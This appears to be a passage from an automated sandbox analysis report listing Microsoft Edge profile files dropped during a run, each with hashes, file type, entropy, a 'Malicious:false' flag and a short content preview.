                                                                                                                                                                                                            SHA-256:65FE157EDB414C410FA8F8FD82C795C630464F0B61328C8B437B4578D6514E91
                                                                                                                                                                                                            SHA-512:421CF31628EF77F0F645769E413ADF931D788B047D4FC8460C02E589041CEC36248A732FB8D5479CC8414BE84063B5E3D86B9571C201CF4016D68118C5303827
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Ve
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4194304
                                                                                                                                                                                                            Entropy (8bit):0.22311720271288046
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:nryYJLFI/yJg3dXmRmOCwrRGu+e97GZ5bLT1F9TC:nrywLm/Kg3dX+mJwUu+e9SZB/9TC
                                                                                                                                                                                                            MD5:1564A7F601256E1241A0B2E19F4B0EC3
                                                                                                                                                                                                            SHA1:34CD385BB5172DD591C66C3FF73C4F3A50FB6A27
                                                                                                                                                                                                            SHA-256:1FA95062F0E5ED0CE930EE0F99B175CCC5AB42C8A24278A74CFE2CC717CCE96A
                                                                                                                                                                                                            SHA-512:4FEAD3B735B6E1BF569894E751E67F9EC169165033EB40995BE12E02E470EC426EC94085380020ADA3A99D6E2678CE65F03EAAB622C4250FB6D4E2BA5F2A6BB6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...@..@...@.....C.].....@...................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".oalbyl20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./..................... ..<.w..U'D.I..G.......W6....{....>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):280
                                                                                                                                                                                                            Entropy (8bit):1.7848956527006603
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:FiWWltl/9U1i2RRIxINXj1C:o1/R2Yq2
                                                                                                                                                                                                            MD5:C48FB0C839F52094E5B7ED752859BB4F
                                                                                                                                                                                                            SHA1:D7863FA68E45C3432E10236A977708A44E300FAB
                                                                                                                                                                                                            SHA-256:EFFCFFAA8C3AE23BC6BBBF20BEFC538BCE1C6641096837F63E94124D5794FB1B
                                                                                                                                                                                                            SHA-512:16AB8BA83EF97293FA75C34EC1C40CB53408159B201A57B2FA2185EE66B21F9708CFA289B9CF3413253BAB4AE7E9700C3469CDCBA03672992077BA8BB22EF641
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:sdPC......................5.y&.K.?....................................................................................................................................................................................................48ea0ba2-e9bb-4568-92cb-0f42a5c5d505............
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8192
                                                                                                                                                                                                            Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                            Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                            MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                            SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                            SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                            SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8192
                                                                                                                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8192
                                                                                                                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):262512
                                                                                                                                                                                                            Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:LsNl8K1:Ls3b1
                                                                                                                                                                                                            MD5:90D409F3C0A3E9B247B73274EB6D3896
                                                                                                                                                                                                            SHA1:AB90139841D1578E0E28D40BECFCFBDC108B0D33
                                                                                                                                                                                                            SHA-256:FAEEDA5C89005AB3C6741F4EF74E1955C0ECA3FD7EA13C2CE279BCE933070DDD
                                                                                                                                                                                                            SHA-512:CAD8375335835BBA28E5BD81C5F0A89E4001526F37E5751B9C901D90BC8B8B68D975FD535438DF4950956980E9BF0BD3566622EF6C9F1442047ED65794A02DE8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..........................................^.`./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33
                                                                                                                                                                                                            Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                            MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                            SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                            SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                            SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):305
                                                                                                                                                                                                            Entropy (8bit):5.224464505640471
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:HUavb0B1wkn23oH+TcwtnG2tbB2KLlVUavdgQ+q2Pwkn23oH+TcwtnG2tMsIFUv:3LfYebn9VFLfGQ+vYfYebn9GFUv
                                                                                                                                                                                                            MD5:64DCADA36BE262882D36842D3F047B3C
                                                                                                                                                                                                            SHA1:1307499BE704356252155A3292AFFC2FF31E753D
                                                                                                                                                                                                            SHA-256:AFCCF674F937E857B36B4030557DF872A323BC98791C87D2AC9E287DB4A19305
                                                                                                                                                                                                            SHA-512:85ADD356045F9CD69C9A95CC04B9559C7F1EB318199B9A41B17549D6BF7C745B352D95A661FFB9F642E3329B2683884001CC4908266667AC0AB3B5E941755CAB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:2024/11/13-07:27:07.399 157c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db since it was missing..2024/11/13-07:27:07.893 157c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):171
                                                                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                            MD5:E952942B492DB39A75DD2669B98EBE74
                                                                                                                                                                                                            SHA1:F6C4DEF325DCA0DFEC01759D7D8610837A370176
                                                                                                                                                                                                            SHA-256:14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
                                                                                                                                                                                                            SHA-512:9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):281
                                                                                                                                                                                                            Entropy (8bit):5.171242956086055
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:HUavRO6M1wkn23oH+Tcwt8aVdg2KLlVUavdr94q2Pwkn23oH+Tcwt8aPrqIFUv:3E6rfYeb0Lfh+vYfYebL3FUv
                                                                                                                                                                                                            MD5:96AD4424D5955266A128C661194A59E9
                                                                                                                                                                                                            SHA1:4DAFC81E50D2468371158CCD68195980947289CE
                                                                                                                                                                                                            SHA-256:D32172BEE8E3CDFEBF42F47779A823535E77C0D14AC86DBF5D0FF559B8F291CC
                                                                                                                                                                                                            SHA-512:F476769CFAA6D6D19720CC383BACE51862874F43B53B334074E373ADB9473A065B8A7AE7A2A6A39D00C1D6005CFBBE6EA2E4E753D07D59F5B801853B407C8A5C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:2024/11/13-07:27:07.412 1c44 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules since it was missing..2024/11/13-07:27:07.895 1c44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):171
                                                                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                            MD5:E952942B492DB39A75DD2669B98EBE74
                                                                                                                                                                                                            SHA1:F6C4DEF325DCA0DFEC01759D7D8610837A370176
                                                                                                                                                                                                            SHA-256:14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
                                                                                                                                                                                                            SHA-512:9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):285
                                                                                                                                                                                                            Entropy (8bit):5.175277480380342
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:HUavd1M1wkn23oH+Tcwt86FB2KLlVUakeT4q2Pwkn23oH+Tcwt865IFUv:3vrfYeb/FFLJ0vYfYeb/WFUv
                                                                                                                                                                                                            MD5:7DFF3D18AAB90E29325F5569271DF201
                                                                                                                                                                                                            SHA1:EA5CAF9C765FF3697EBAB5C6175E342EFFBD8944
                                                                                                                                                                                                            SHA-256:451414EF2FB555476DF13F8C3612D857C138791DF137CBA49C172B5C82EE49D8
                                                                                                                                                                                                            SHA-512:A2D1BA890B224869B9490A0601CDBF4281D5097C6286220025429E1B5F2F06FFA70791BDF8DEB20860CB9A6CC7AEED9E78E014D65EA3E32F67EF0334F954B20B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:2024/11/13-07:27:07.896 1c44 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts since it was missing..2024/11/13-07:27:08.267 1c44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 39, 1st free page 10, free pages 4, cookie 0x45, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):159744
                                                                                                                                                                                                            Entropy (8bit):0.5241404324800358
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:56U+bGzPDLjGQLBE3up+U0jBo4tgi3JMe9xJDECVjN:5R+GPXBBE3upb0HtTTDxVj
                                                                                                                                                                                                            MD5:241322143A01979D346689D9448AC8C0
                                                                                                                                                                                                            SHA1:DD95F97EE1CCB8FD9026D2156DE9CB8137B816D1
                                                                                                                                                                                                            SHA-256:65EEBDEC4F48A111AC596212A1D71C3A5CFA996797500E5344EEABDFA02527C8
                                                                                                                                                                                                            SHA-512:9C7241462A9DADEF25D8EEB1C14BABFBA65C451EBAFBC068B9856E4EF0EB6F894A44686CBB0D1F46C7F546335D0C53A3E386E6C1A017082DE127F8F9C0A54BD2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ .......'...........E......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                                            Entropy (8bit):0.33890226319329847
                                                                                                                                                                                                            Encrypted:false
